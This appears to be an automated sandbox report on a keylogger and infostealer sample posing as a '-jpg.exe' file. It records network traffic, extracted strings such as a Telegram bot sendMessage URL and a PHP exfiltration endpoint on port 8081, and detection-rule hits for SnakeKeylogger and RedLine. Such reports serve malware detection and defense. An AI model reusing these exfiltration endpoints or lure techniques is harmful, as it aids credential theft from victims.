                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 12:26:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: svchost.exe, 00000002.00000002.4639663388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000056D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: svchost.exe, 00000002.00000002.4639663388.00000000056A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: svchost.exe, 00000002.00000002.4639663388.000000000554D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.000000000554D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: svchost.exe, 00000002.00000002.4639663388.0000000005578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
                Source: svchost.exe, 00000002.00000002.4639663388.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: svchost.exe, 00000002.00000002.4639663388.00000000056D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: svchost.exe, 00000002.00000002.4639663388.00000000056D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49814 version: TLS 1.2
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                System Summary

                barindex
                Source: 0.2.#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe.3e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000000.00000002.2200420683.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4637698281.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C2720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,2_2_000C2720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,2_2_000C3540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,2_2_000C33C0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004096A00_2_004096A0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0042200C0_2_0042200C
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0041A2170_2_0041A217
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004122160_2_00412216
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0042435D0_2_0042435D
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004033C00_2_004033C0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044F4300_2_0044F430
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004125E80_2_004125E8
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044663B0_2_0044663B
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004138010_2_00413801
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0042096F0_2_0042096F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004129D00_2_004129D0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004119E30_2_004119E3
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040FA100_2_0040FA10
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00423C810_2_00423C81
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00411E780_2_00411E78
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00442E0C0_2_00442E0C
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00420EC00_2_00420EC0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044CF170_2_0044CF17
